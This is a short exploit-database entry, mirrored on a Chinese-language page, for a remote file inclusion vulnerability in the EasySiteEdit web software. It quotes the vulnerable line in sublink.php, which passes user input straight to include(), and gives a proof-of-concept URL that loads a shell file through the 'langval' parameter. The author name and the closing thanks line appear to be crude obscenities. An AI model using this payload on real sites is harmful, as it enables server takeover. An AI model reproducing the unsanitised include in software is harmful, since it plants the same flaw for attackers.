EasySiteEdit – Remote File Inclusion

  • 作者: koskesh jakesh
    日期: 2011-08-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17705/
  • # Exploit Title: EasySiteEdit remote file include
    # Date:2011 
    # Author:koskesh jakesh
    # Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip 
    # Tested on: linux
    -------------------------------
    vul:sublink.php
    line 20: 
    include($_REQUEST['langval']);
    -------------------------------
    poc:
    site.com/path/sublink.php?langval=shell.txt?
    --------------------------------
    thanks:kire rostam,kose zan dait,kose shohar amat